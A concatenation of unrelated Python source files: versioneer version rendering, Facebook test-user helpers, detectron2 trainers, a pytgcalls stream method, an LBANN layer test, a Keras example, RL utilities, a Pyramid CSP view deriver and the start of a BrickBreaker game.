rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {
"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"],
"date": None,
}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-branch":
rendered = render_pep440_branch(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-post-branch":
rendered = render_pep440_post_branch(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {
"version": rendered,
"full-revisionid": pieces["long"],
"dirty": pieces["dirty"],
"error": None,
"date": pieces.get("date"),
}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix, verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for _ in cfg.versionfile_source.split("/"):
root = os.path.dirname(root)
except NameError:
return {
"version": "0+unknown",
"full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree",
"date": None,
}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {
"version": "0+unknown",
"full-revisionid": None,
"dirty": None,
"error": "unable to compute version",
"date": None,
}
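# Example return value (illustrative; the actual values depend on the checkout):
#   {"version": "0.1.3+2.gabc1234", "full-revisionid": "abc1234...",
#    "dirty": False, "error": None, "date": "2021-01-01T12:00:00+0000"}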
|
the-stack_0_12280 | #coding=utf-8
from facebook.modules.profile.user.models import TestUser
from facebook.graph import GraphAPIError
from django.utils import simplejson
class TestUsers(object):
def __init__(self, graph):
self.graph = graph
# Friend requests need user access token
def update_access_token(self, access_token):
self.graph.access_token = access_token
def generate_new_test_user(self, installed=True, permissions=[]):
response = self.graph.request('%s/accounts/test-users' % self.graph.app_id, None,
{'installed': installed, 'permissions': ', '.join(permissions) })
user = TestUser()
user.save_from_facebook(response, app_id=self.graph.app_id)
return user
def get_test_users(self, login_url_required=False):
""" users is a dict array with the fields access_token, login_url and id. """
response = self.graph.request('%s/accounts/test-users' % self.graph.app_id,
{'access_token': self.graph.access_token })['data']
users=[]
for item in response:
# Facebook sometimes does not deliver a login-url. Ignore those users.
try:
testuser, created = TestUser.objects.get_or_create(id=item['id'],
defaults={'id': item['id'], 'login_url': item['login_url'],
'belongs_to': self.graph.app_id,
'_graph': simplejson.dumps(item) })
if created:
testuser.save_from_facebook(item, app_id=self.graph.app_id)
else:
testuser.login_url = item['login_url']
testuser._graph = simplejson.dumps(item)
testuser.save()
users.append(testuser)
except KeyError:
pass
# cleanup db
users_ids=[int(i['id']) for i in response]
testusers = TestUser.objects.select_related(depth=1).filter(belongs_to=self.graph.app_id)
for user in testusers:
if user.id not in users_ids:
user.delete()
elif not user._name and user.access_token:
self.graph.access_token = user.access_token
response = user.get_from_facebook(graph=self.graph, save=True)
return testusers
def friend_request(self, user1, user2):
graph = self.graph
graph.access_token = user1.access_token
return graph.request('%s/friends/%s' % (user1.id, user2.id), None, {})
def make_friends_with(self, user1, user2):
response = []
self.update_access_token(user1.access_token)
try:
response.append(self.friend_request(user1, user2))
except GraphAPIError as error: #No access token if the user is not authorized.
response.append(error)
self.update_access_token(user2.access_token)
try:
response.append(self.friend_request(user2, user1))
except GraphAPIError as error:
response.append(error)
return response
def unfriend(self, user1, user2):
pass
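# Hypothetical usage sketch (not part of this module); `graph` is assumed to be
# an app-authenticated GraphAPI instance:
#
#   test_users = TestUsers(graph)
#   alice = test_users.generate_new_test_user(installed=True, permissions=['email'])
#   bob = test_users.generate_new_test_user(installed=True, permissions=['email'])
#   test_users.make_friends_with(alice, bob)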
|
the-stack_0_12283 | # -*- coding: utf-8 -*-
# Copyright (c) Facebook, Inc. and its affiliates.
import logging
import numpy as np
import time
import weakref
from typing import Dict, List, Optional
import torch
from torch.nn.parallel import DataParallel, DistributedDataParallel
import detectron2.utils.comm as comm
from detectron2.utils.events import EventStorage, get_event_storage
from detectron2.utils.logger import _log_api_usage
__all__ = ["HookBase", "TrainerBase", "SimpleTrainer", "AMPTrainer"]
class HookBase:
"""
Base class for hooks that can be registered with :class:`TrainerBase`.
Each hook can implement 4 methods. The way they are called is demonstrated
in the following snippet:
::
hook.before_train()
for iter in range(start_iter, max_iter):
hook.before_step()
trainer.run_step()
hook.after_step()
iter += 1
hook.after_train()
Notes:
1. In the hook method, users can access ``self.trainer`` to access more
properties about the context (e.g., model, current iteration, or config
if using :class:`DefaultTrainer`).
2. A hook that does something in :meth:`before_step` can often be
implemented equivalently in :meth:`after_step`.
If the hook takes non-trivial time, it is strongly recommended to
implement the hook in :meth:`after_step` instead of :meth:`before_step`.
The convention is that :meth:`before_step` should only take negligible time.
Following this convention will allow hooks that do care about the difference
between :meth:`before_step` and :meth:`after_step` (e.g., timer) to
function properly.
"""
trainer: "TrainerBase" = None
"""
A weak reference to the trainer object. Set by the trainer when the hook is registered.
"""
def before_train(self):
"""
Called before the first iteration.
"""
pass
def after_train(self):
"""
Called after the last iteration.
"""
pass
def before_step(self):
"""
Called before each iteration.
"""
pass
def after_step(self):
"""
Called after each iteration.
"""
pass
def state_dict(self):
"""
Hooks are stateless by default, but can be made checkpointable by
implementing `state_dict` and `load_state_dict`.
"""
return {}
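# Illustrative example (not part of detectron2): a minimal hook that records the
# wall-clock time of each iteration, keeping before_step negligible as the
# HookBase docstring above recommends.
class _ExampleIterTimerHook(HookBase):
    def before_step(self):
        # only store a timestamp; all real work happens in after_step
        self._start = time.perf_counter()

    def after_step(self):
        # write the per-iteration time into the trainer's event storage
        self.trainer.storage.put_scalar(
            "example_iter_time", time.perf_counter() - self._start
        )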
class TrainerBase:
"""
Base class for iterative trainer with hooks.
The only assumption we made here is: the training runs in a loop.
A subclass can implement what the loop is.
We made no assumptions about the existence of dataloader, optimizer, model, etc.
Attributes:
iter(int): the current iteration.
start_iter(int): The iteration to start with.
By convention the minimum possible value is 0.
max_iter(int): The iteration to end training.
storage(EventStorage): An EventStorage that's opened during the course of training.
"""
def __init__(self) -> None:
self._hooks: List[HookBase] = []
self.iter: int = 0
self.start_iter: int = 0
self.max_iter: int
self.storage: EventStorage
_log_api_usage("trainer." + self.__class__.__name__)
def register_hooks(self, hooks: List[Optional[HookBase]]) -> None:
"""
Register hooks to the trainer. The hooks are executed in the order
they are registered.
Args:
hooks (list[Optional[HookBase]]): list of hooks
"""
hooks = [h for h in hooks if h is not None]
for h in hooks:
assert isinstance(h, HookBase)
# To avoid circular reference, hooks and trainer cannot own each other.
# This normally does not matter, but will cause memory leak if the
# involved objects contain __del__:
# See http://engineering.hearsaysocial.com/2013/06/16/circular-references-in-python/
h.trainer = weakref.proxy(self)
self._hooks.extend(hooks)
def train(self, start_iter: int, max_iter: int):
"""
Args:
start_iter, max_iter (int): See docs above
"""
logger = logging.getLogger(__name__)
logger.info("Starting training from iteration {}".format(start_iter))
self.iter = self.start_iter = start_iter
self.max_iter = max_iter
with EventStorage(start_iter) as self.storage:
try:
self.before_train()
for self.iter in range(start_iter, max_iter):
self.before_step()
self.run_step()
self.after_step()
# self.iter == max_iter can be used by `after_train` to
# tell whether the training successfully finished or failed
# due to exceptions.
self.iter += 1
except Exception:
logger.exception("Exception during training:")
raise
finally:
self.after_train()
def before_train(self):
for h in self._hooks:
h.before_train()
def after_train(self):
self.storage.iter = self.iter
for h in self._hooks:
h.after_train()
def before_step(self):
# Maintain the invariant that storage.iter == trainer.iter
# for the entire execution of each step
self.storage.iter = self.iter
for h in self._hooks:
h.before_step()
def after_step(self):
for h in self._hooks:
h.after_step()
def run_step(self):
raise NotImplementedError
def state_dict(self):
ret = {"iteration": self.iter}
hooks_state = {}
for h in self._hooks:
sd = h.state_dict()
if sd:
name = type(h).__qualname__
if name in hooks_state:
# TODO handle repetitive stateful hooks
continue
hooks_state[name] = sd
if hooks_state:
ret["hooks"] = hooks_state
return ret
def load_state_dict(self, state_dict):
logger = logging.getLogger(__name__)
self.iter = state_dict["iteration"]
for key, value in state_dict.get("hooks", {}).items():
for h in self._hooks:
try:
name = type(h).__qualname__
except AttributeError:
continue
if name == key:
h.load_state_dict(value)
break
else:
logger.warning(f"Cannot find the hook '{key}', its state_dict is ignored.")
class SimpleTrainer(TrainerBase):
"""
A simple trainer for the most common type of task:
single-cost single-optimizer single-data-source iterative optimization,
optionally using data-parallelism.
It assumes that every step, you:
1. Compute the loss with a data from the data_loader.
2. Compute the gradients with the above loss.
3. Update the model with the optimizer.
All other tasks during training (checkpointing, logging, evaluation, LR schedule)
are maintained by hooks, which can be registered by :meth:`TrainerBase.register_hooks`.
If you want to do anything fancier than this,
either subclass TrainerBase and implement your own `run_step`,
or write your own training loop.
"""
def __init__(self, model, data_loader, optimizer):
"""
Args:
model: a torch Module. Takes a data from data_loader and returns a
dict of losses.
data_loader: an iterable. Contains data to be used to call model.
optimizer: a torch optimizer.
"""
super().__init__()
"""
We set the model to training mode in the trainer.
However it's valid to train a model that's in eval mode.
If you want your model (or a submodule of it) to behave
like evaluation during training, you can overwrite its train() method.
"""
model.train()
self.model = model
self.data_loader = data_loader
self._data_loader_iter = iter(data_loader)
self.optimizer = optimizer
def run_step(self):
"""
Implement the standard training logic described above.
"""
assert self.model.training, "[SimpleTrainer] model was changed to eval mode!"
start = time.perf_counter()
"""
If you want to do something with the data, you can wrap the dataloader.
"""
data = next(self._data_loader_iter)
data_time = time.perf_counter() - start
"""
If you want to do something with the losses, you can wrap the model.
"""
loss_dict = self.model(data)
if isinstance(loss_dict, torch.Tensor):
losses = loss_dict
loss_dict = {"total_loss": loss_dict}
else:
losses = sum(loss_dict.values())
"""
If you need to accumulate gradients or do something similar, you can
wrap the optimizer with your custom `zero_grad()` method.
"""
self.optimizer.zero_grad()
losses.backward()
self._write_metrics(loss_dict, data_time)
"""
If you need gradient clipping/scaling or other processing, you can
wrap the optimizer with your custom `step()` method. But it is
suboptimal as explained in https://arxiv.org/abs/2006.15704 Sec 3.2.4
"""
self.optimizer.step()
def _write_metrics(
self,
loss_dict: Dict[str, torch.Tensor],
data_time: float,
prefix: str = "",
):
"""
Args:
loss_dict (dict): dict of scalar losses
data_time (float): time taken by the dataloader iteration
"""
metrics_dict = {k: v.detach().cpu().item() for k, v in loss_dict.items()}
metrics_dict["data_time"] = data_time
# Gather metrics among all workers for logging
# This assumes we do DDP-style training, which is currently the only
# supported method in detectron2.
all_metrics_dict = comm.gather(metrics_dict)
if comm.is_main_process():
storage = get_event_storage()
# data_time among workers can have high variance. The actual latency
# caused by data_time is the maximum among workers.
data_time = np.max([x.pop("data_time") for x in all_metrics_dict])
storage.put_scalar("data_time", data_time)
# average the rest metrics
metrics_dict = {
k: np.mean([x[k] for x in all_metrics_dict]) for k in all_metrics_dict[0].keys()
}
total_losses_reduced = sum(metrics_dict.values())
if not np.isfinite(total_losses_reduced):
raise FloatingPointError(
f"Loss became infinite or NaN at iteration={self.iter}!\n"
f"loss_dict = {metrics_dict}"
)
storage.put_scalar("{}total_loss".format(prefix), total_losses_reduced)
if len(metrics_dict) > 1:
storage.put_scalars(**metrics_dict)
def state_dict(self):
ret = super().state_dict()
ret["optimizer"] = self.optimizer.state_dict()
return ret
def load_state_dict(self, state_dict):
super().load_state_dict(state_dict)
self.optimizer.load_state_dict(state_dict["optimizer"])
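# Illustrative usage sketch (not part of detectron2); model, data_loader and
# optimizer are assumed to be constructed elsewhere:
#
#   trainer = SimpleTrainer(model, data_loader, optimizer)
#   trainer.register_hooks([...])   # e.g. checkpointing / LR-schedule hooks
#   trainer.train(start_iter=0, max_iter=90000)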
class AMPTrainer(SimpleTrainer):
"""
Like :class:`SimpleTrainer`, but uses PyTorch's native automatic mixed precision
in the training loop.
"""
def __init__(self, model, data_loader, optimizer, grad_scaler=None):
"""
Args:
model, data_loader, optimizer: same as in :class:`SimpleTrainer`.
grad_scaler: torch GradScaler to automatically scale gradients.
"""
unsupported = "AMPTrainer does not support single-process multi-device training!"
if isinstance(model, DistributedDataParallel):
assert not (model.device_ids and len(model.device_ids) > 1), unsupported
assert not isinstance(model, DataParallel), unsupported
super().__init__(model, data_loader, optimizer)
if grad_scaler is None:
from torch.cuda.amp import GradScaler
grad_scaler = GradScaler()
self.grad_scaler = grad_scaler
def run_step(self):
"""
Implement the AMP training logic.
"""
assert self.model.training, "[AMPTrainer] model was changed to eval mode!"
assert torch.cuda.is_available(), "[AMPTrainer] CUDA is required for AMP training!"
from torch.cuda.amp import autocast
start = time.perf_counter()
data = next(self._data_loader_iter)
data_time = time.perf_counter() - start
with autocast():
loss_dict = self.model(data)
if isinstance(loss_dict, torch.Tensor):
losses = loss_dict
loss_dict = {"total_loss": loss_dict}
else:
losses = sum(loss_dict.values())
self.optimizer.zero_grad()
self.grad_scaler.scale(losses).backward()
self._write_metrics(loss_dict, data_time)
self.grad_scaler.step(self.optimizer)
self.grad_scaler.update()
def state_dict(self):
ret = super().state_dict()
ret["grad_scaler"] = self.grad_scaler.state_dict()
return ret
def load_state_dict(self, state_dict):
super().load_state_dict(state_dict)
self.grad_scaler.load_state_dict(state_dict["grad_scaler"])
|
the-stack_0_12285 | import asyncio
from ...exceptions import NodeJSNotRunning
from ...exceptions import NoMtProtoClientSet
from ...exceptions import NotInGroupCallError
from ...scaffold import Scaffold
from ...types import NotInGroupCall
from ...types.session import Session
class ResumeStream(Scaffold):
async def resume_stream(
self,
chat_id: int,
):
"""Resume the paused stream
This method allows you to resume the paused stream.
Parameters:
chat_id (``int``):
Unique identifier (int) of the target chat.
Raises:
NoMtProtoClientSet: In case you try
to call this method without any MtProto client
NodeJSNotRunning: In case you try
to call this method without do
:meth:`~pytgcalls.PyTgCalls.start` before
NotInGroupCallError: In case you try
to leave a non-joined group call
Returns:
``bool``:
On success, ``True`` is returned if the stream was resumed
Example:
.. code-block:: python
:emphasize-lines: 10-12
from pytgcalls import PyTgCalls
from pytgcalls import idle
...
app = PyTgCalls(client)
app.start()
... # Call API methods
app.resume_stream(
-1001185324811,
)
idle()
"""
if self._app is not None:
if self._wait_until_run is not None:
solver_id = Session.generate_session_id(24)
async def internal_sender():
if not self._wait_until_run.done():
await self._wait_until_run
await self._binding.send({
'action': 'resume',
'chat_id': chat_id,
'solver_id': solver_id,
})
active_call = self._call_holder.get_active_call(chat_id)
asyncio.ensure_future(internal_sender())
result = await self._wait_result.wait_future_update(
solver_id,
)
if isinstance(result, NotInGroupCall):
raise NotInGroupCallError()
return active_call.status == 'paused'
else:
raise NodeJSNotRunning()
else:
raise NoMtProtoClientSet()
|
the-stack_0_12286 | import functools
import operator
import os
import os.path
import sys
import numpy as np
# Bamboo utilities
current_file = os.path.realpath(__file__)
print("Current file:",current_file, __file__)
current_dir = os.path.dirname(current_file)
sys.path.insert(0, os.path.join(os.path.dirname(current_dir), 'common_python'))
import tools
# ==============================================
# Objects for Python data reader
# ==============================================
# Note: The Python data reader imports this file as a module and calls
# the functions below to ingest data.
# Data
np.random.seed(201910244)
_num_samples = 128
_sample_size = 64
_sample_dims = (2,2,8)
_sample_size = functools.reduce(operator.mul, _sample_dims)
_samples = np.random.normal(size=(_num_samples,_sample_size)).astype(np.float32)
# Sample access functions
def get_sample(index):
return _samples[index,:]
def num_samples():
return _num_samples
def sample_dims():
return (_sample_size,)
# ==============================================
# Setup LBANN experiment
# ==============================================
def setup_experiment(lbann):
"""Construct LBANN experiment.
Args:
lbann (module): Module for LBANN Python frontend
"""
mini_batch_size = num_samples() // 2
trainer = lbann.Trainer(mini_batch_size)
model = construct_model(lbann)
data_reader = construct_data_reader(lbann)
optimizer = lbann.NoOptimizer()
return trainer, model, data_reader, optimizer
def construct_model(lbann):
"""Construct LBANN model.
Args:
lbann (module): Module for LBANN Python frontend
"""
# Input data
# Note: Sum with a weights layer so that gradient checking will
# verify that error signals are correct.
x_weights = lbann.Weights(optimizer=lbann.SGD(),
initializer=lbann.ConstantInitializer(value=0.0),
name='input_weights')
x = lbann.Sum(lbann.Reshape(lbann.Input(data_field='samples'),
dims=tools.str_list(_sample_dims)),
lbann.WeightsLayer(weights=x_weights,
dims=tools.str_list(_sample_dims)))
x_lbann = x
# Objects for LBANN model
obj = []
metrics = []
callbacks = []
# ------------------------------------------
# Data-parallel layout
# ------------------------------------------
# LBANN implementation
x = x_lbann
y = lbann.Identity(x, data_layout='data_parallel')
slice_points = (0, 4, 8)
x_slice = lbann.Slice(x, axis=2, slice_points=tools.str_list(slice_points),parallel_strategy = {'sub_branch_tag':0,'enable_subgraph':True})
branch1 = lbann.Identity(x_slice, data_layout='data_parallel',parallel_strategy = {'sub_branch_tag':1,'enable_subgraph':True})
branch2 = lbann.Identity(x_slice, data_layout='data_parallel',parallel_strategy = {'sub_branch_tag':2,'enable_subgraph':True})
branch1 = lbann.L2Norm2(branch1)
branch2 = lbann.L2Norm2(branch2)
sum_branch = lbann.Sum([branch1,branch2],parallel_strategy = {'sub_branch_tag':0,'enable_subgraph':True})
z = lbann.Identity(sum_branch)
obj.append(z)
metrics.append(lbann.Metric(z, name='data-parallel layout'))
# NumPy implementation
vals = []
for i in range(num_samples()):
x = get_sample(i).reshape(_sample_dims).astype(np.float64)
y = []
cross_sum = 0
for j in range(len(slice_points)-1):
x_slice = x[:,:,slice_points[j]:slice_points[j+1]]
x_l2 = tools.numpy_l2norm2(x_slice)
if(j==0):
cross_sum = x_l2
else:
cross_sum += x_l2
z = cross_sum
vals.append(z)
val = np.mean(vals)
tol = 8 * val * np.finfo(np.float32).eps
callbacks.append(lbann.CallbackCheckMetric(
metric=metrics[-1].name,
lower_bound=val-tol,
upper_bound=val+tol,
error_on_failure=True,
execution_modes='test'))
# ------------------------------------------
# Gradient checking
# ------------------------------------------
callbacks.append(lbann.CallbackCheckGradients(error_on_failure=True))
# ------------------------------------------
# Construct model
# ------------------------------------------
num_epochs = 0
return lbann.Model(num_epochs,subgraph_communication=lbann.SubgraphCommunication.COLL_OPT,
layers=lbann.traverse_layer_graph(x_lbann),
objective_function=obj,
metrics=metrics,
callbacks=callbacks)
def construct_data_reader(lbann):
"""Construct Protobuf message for Python data reader.
The Python data reader will import the current Python file to
access the sample access functions.
Args:
lbann (module): Module for LBANN Python frontend
"""
# Note: The training data reader should be removed when
# https://github.com/LLNL/lbann/issues/1098 is resolved.
message = lbann.reader_pb2.DataReader()
message.reader.extend([
tools.create_python_data_reader(
lbann,
current_file,
'get_sample',
'num_samples',
'sample_dims',
'train'
)
])
message.reader.extend([
tools.create_python_data_reader(
lbann,
current_file,
'get_sample',
'num_samples',
'sample_dims',
'test'
)
])
return message
# ==============================================
# Setup PyTest
# ==============================================
# Create test functions that can interact with PyTest
for _test_func in tools.create_tests(setup_experiment, __file__):
globals()[_test_func.__name__] = _test_func
|
the-stack_0_12289 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: kerasexa
Description: Keras example
https://keras.io/getting-started/sequential-model-guide/
Email : [email protected]
Date:2018/1/1
"""
import keras
import numpy as np
from keras.layers import Dense, Dropout
from keras.models import Sequential
from keras.optimizers import SGD
# Generate dummy data
x_train = np.random.random((1000, 20))
y_train = keras.utils.to_categorical(np.random.randint(10, size=(1000, 1)), num_classes=10)
x_test = np.random.random((100, 20))
y_test = keras.utils.to_categorical(np.random.randint(10, size=(100, 1)), num_classes=10)
model = Sequential()
# Dense(64) is a fully-connected layer with 64 hidden units.
# in the first layer, you must specify the expected input data shape:
# here, 20-dimensional vectors.
model.add(Dense(64, activation='relu', input_dim=20))
model.add(Dropout(0.5))
model.add(Dense(64, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(10, activation='softmax'))
sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])
model.fit(x_train, y_train, epochs=200, batch_size=128)
score = model.evaluate(x_test, y_test, batch_size=128)
print(score)
|
the-stack_0_12293 | from __future__ import print_function
import os
import torch
from torch.utils.ffi import create_extension
sources = ['src/roi_pooling.cpp']
headers = ['src/roi_pooling.h']
defines = []
with_cuda = False
if torch.cuda.is_available():
print('Including CUDA code.')
sources += ['src/roi_pooling_cuda.cpp']
headers += ['src/roi_pooling_cuda.h']
defines += [('WITH_CUDA', None)]
with_cuda = True
this_file = os.path.dirname(os.path.realpath(__file__))
print(this_file)
extra_objects = ['src/roi_pooling.cu.o']
extra_objects = [os.path.join(this_file, fname) for fname in extra_objects]
ffi = create_extension(
'_ext.roi_pooling',
headers=headers,
sources=sources,
define_macros=defines,
relative_to=__file__,
with_cuda=with_cuda,
extra_objects=extra_objects,
libraries=["ATen", '_C', 'cudart']
)
if __name__ == '__main__':
ffi.build()
|
the-stack_0_12294 | import os
import torch
import torch.nn.functional as F
import torch.distributed as dist
from torch.autograd import Variable
import numpy as np
# https://github.com/ikostrikov/pytorch-ddpg-naf/blob/master/ddpg.py#L11
def soft_update(target, source, tau):
"""
Perform DDPG soft update (move target params toward source based on weight
factor tau)
Inputs:
target (torch.nn.Module): Net to copy parameters to
source (torch.nn.Module): Net whose parameters to copy
tau (float, 0 < x < 1): Weight factor for update
"""
for target_param, param in zip(target.parameters(), source.parameters()):
target_param.data.copy_(target_param.data * (1.0 - tau) + param.data * tau)
# https://github.com/ikostrikov/pytorch-ddpg-naf/blob/master/ddpg.py#L15
def hard_update(target, source):
"""
Copy network parameters from source to target
Inputs:
target (torch.nn.Module): Net to copy parameters to
source (torch.nn.Module): Net whose parameters to copy
"""
for target_param, param in zip(target.parameters(), source.parameters()):
target_param.data.copy_(param.data)
# https://github.com/seba-1511/dist_tuto.pth/blob/gh-pages/train_dist.py
def average_gradients(model):
""" Gradient averaging. """
size = float(dist.get_world_size())
for param in model.parameters():
dist.all_reduce(param.grad.data, op=dist.reduce_op.SUM, group=0)
param.grad.data /= size
# https://github.com/seba-1511/dist_tuto.pth/blob/gh-pages/train_dist.py
def init_processes(rank, size, fn, backend='gloo'):
""" Initialize the distributed environment. """
os.environ['MASTER_ADDR'] = '127.0.0.1'
os.environ['MASTER_PORT'] = '29500'
dist.init_process_group(backend, rank=rank, world_size=size)
fn(rank, size)
def onehot_from_logits(logits, eps=0.0):
"""
Given batch of logits, return one-hot sample using epsilon greedy strategy
(based on given epsilon)
"""
# get best (according to current policy) actions in one-hot form
argmax_acs = (logits == logits.max(1, keepdim=True)[0]).float()
if eps == 0.0:
return argmax_acs
# get random actions in one-hot form
rand_acs = Variable(torch.eye(logits.shape[1])[[np.random.choice(
range(logits.shape[1]), size=logits.shape[0])]], requires_grad=False)
# chooses between best and random actions using epsilon greedy
return torch.stack([argmax_acs[i] if r > eps else rand_acs[i] for i, r in
enumerate(torch.rand(logits.shape[0]))])
# modified for PyTorch from https://github.com/ericjang/gumbel-softmax/blob/master/Categorical%20VAE.ipynb
def sample_gumbel(shape, eps=1e-20, tens_type=torch.FloatTensor):
"""Sample from Gumbel(0, 1)"""
U = Variable(tens_type(*shape).uniform_(), requires_grad=False)
return -torch.log(-torch.log(U + eps) + eps)
# modified for PyTorch from https://github.com/ericjang/gumbel-softmax/blob/master/Categorical%20VAE.ipynb
def gumbel_softmax_sample(logits, temperature):
""" Draw a sample from the Gumbel-Softmax distribution"""
gumbSamp = sample_gumbel(logits.shape, tens_type=type(logits.data))
if logits.is_cuda:
gumbSamp = gumbSamp.cuda()
y = logits + gumbSamp
return F.softmax(y / temperature, dim=-1)
# modified for PyTorch from https://github.com/ericjang/gumbel-softmax/blob/master/Categorical%20VAE.ipynb
def gumbel_softmax(logits, temperature=1.0, hard=False):
"""Sample from the Gumbel-Softmax distribution and optionally discretize.
Args:
logits: [batch_size, n_class] unnormalized log-probs
temperature: non-negative scalar
hard: if True, take argmax, but differentiate w.r.t. soft sample y
Returns:
[batch_size, n_class] sample from the Gumbel-Softmax distribution.
If hard=True, then the returned sample will be one-hot, otherwise it will
      be a probability distribution that sums to 1 across classes
"""
y = gumbel_softmax_sample(logits, temperature)
    if hard:
        # Straight-through estimator: the forward pass uses the hard one-hot
        # sample, while gradients flow through the soft sample y.
        y_hard = onehot_from_logits(y)
        y = (y_hard - y).detach() + y
return y
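# Illustrative usage sketch (added example, not part of the original file):
# draw hard but differentiable one-hot samples from random logits. The shape
# (a batch of 3 over 4 classes) and the temperature are arbitrary example values.
if __name__ == '__main__':
    example_logits = Variable(torch.randn(3, 4), requires_grad=True)
    hard_sample = gumbel_softmax(example_logits, temperature=0.8, hard=True)
    print(hard_sample)         # one-hot rows; gradients still flow to example_logits
    print(hard_sample.sum(1))  # each row sums to 1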
|
the-stack_0_12296 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
def csp_protected_view(view, info):
"""
A view deriver which adds Content-Security-Policy headers to responses.
By default, a global policy is applied to every view.
Individual views can opt out of CSP altogether by specifying a view option
``csp_insecure_optout=True``. This is not recommended.
"""
if not info.registry.settings.get("csp.enabled", False):
return view
# Views can set ``csp_insecure_optout=True`` in their view options to
# disable CSP for the view.
if info.options.get("csp_insecure_optout"):
return view
policy = info.registry.settings.get("csp", {})
clauses = [
" ".join([directive] + values) for directive, values in sorted(policy.items())
]
header_value = "; ".join(clauses)
if info.registry.settings.get("csp.report_only", False):
header_name = "Content-Security-Policy-Report-Only"
else:
header_name = "Content-Security-Policy"
def wrapper_view(context, request):
resp = view(context, request)
resp.headers[header_name] = header_value
return resp
return wrapper_view
csp_protected_view.options = ("csp_insecure_optout",)
def includeme(config):
config.add_view_deriver(csp_protected_view)
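# Illustrative settings sketch (added example, not part of the original
# module). The key names mirror the lookups in csp_protected_view above; the
# policy directives and CDN host are hypothetical.
EXAMPLE_CSP_SETTINGS = {
    "csp.enabled": True,
    "csp.report_only": False,
    "csp": {
        "default-src": ["'self'"],
        "script-src": ["'self'", "https://cdn.example.com"],
    },
}
# With this policy the deriver above would set, on every response:
#   Content-Security-Policy: default-src 'self'; script-src 'self' https://cdn.example.com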
|
the-stack_0_12298 | """
This file contains the fundamental BrickBreaker game logic.
"""
import pygame
from pygame.locals import *
from GameElements import Paddle, Ball, Brick, Special, SpecialText, \
SpecialType, to_drop_special, choose_random_special, BOUNCE_OFF_VECTORS
from Player import Player
from LevelGenerator import LevelGenerator
from GameElements import Movement
from enum import Enum
from DatabaseInteract import DatabaseInteract
from GameState import GameState
from Constants import DISPLAY_WIDTH, DISPLAY_HEIGHT, WHITE, BLUE
from UIElement import TextElement
from pygame.sprite import RenderUpdates
from HighscorePage import highscore
import os
DEFAULT_CLOCK_SPEED = 60
CLOCK_SPEED_CHANGE_FACTOR = 1.5
class RectSide(Enum):
""" Enum indicating different sides of a rectangle """
TOP = 0
BOTTOM = 1
LEFT = 3
RIGHT = 3
class CollisionType(Enum):
""" Enum indication the possible brick collision types """
HORIZONTAL = 0
VERTICAL = 1
class Brickbreaker:
def __init__(self):
"""
description:
- Create a new instance of the Brickbreaker class.
- Initialize all attributes.
"""
self.clock_speed = DEFAULT_CLOCK_SPEED
self.screen = pygame.display.set_mode((DISPLAY_WIDTH, DISPLAY_HEIGHT))
self.bricks = []
self.number_unbreakable_bricks = 0
self.paddle = Paddle()
self.ball = Ball()
self.present_specials = []
self.active_special = None
self.spcl_text = None
pygame.font.init()
self.font = pygame.font.SysFont("Arial", 25)
self.player = Player(current_level=1)
def start_game(self):
"""
description:
- Create new level.
- Position the paddle to the middle of the screen.
- Call method to choose starting angle.
:return: nothing
"""
self.create_blocks()
self.paddle.reset_position()
self.reset_ball()
def reset_ball(self):
"""
description:
        - Center the ball over the paddle and give the player the opportunity to choose the initial angle.
        - Loop:
            - Switch angles using the custom-set left and right keys. The selected angle is displayed.
            - Shoot the ball using the custom-set shoot key.
:return: nothing
"""
if not (self.active_special is None):
self.remove_special()
dbi = DatabaseInteract()
sets = dbi.get_settings()
key_left = int(sets[2])
key_right = int(sets[4])
key_shoot = int(sets[9])
self.ball.center_over_paddle(self.paddle.get_center())
vector_indicator_start = (self.ball.form.centerx, self.ball.form.centery - 5)
current_index = int(len(BOUNCE_OFF_VECTORS)/2) - 1
clock = pygame.time.Clock()
vector_selected = False
while not vector_selected:
clock.tick(60)
self.draw_all()
self.draw_start_text()
currently_selected_vector = BOUNCE_OFF_VECTORS[current_index]
events = pygame.event.get()
for event in events:
if event.type == QUIT:
os._exit(1)
if event.type == pygame.KEYDOWN:
if event.key == key_left:
if current_index > 0:
current_index -= 1
elif event.key == key_right:
if current_index < len(BOUNCE_OFF_VECTORS) - 1:
current_index += 1
elif event.key == key_shoot:
self.ball.vector = currently_selected_vector
vector_selected = True
break
elif event.key == pygame.K_ESCAPE:
return GameState.TITLE
vector_indicator_end = (vector_indicator_start[0] + 10 * currently_selected_vector[0],
vector_indicator_start[1] + 10 * currently_selected_vector[1])
pygame.draw.line(self.screen, WHITE, vector_indicator_start, vector_indicator_end, 3)
pygame.display.flip()
def create_blocks(self):
"""
description:
- Create the bricks for the player's current level using the LevelGenerator-Class.
:return: nothing
"""
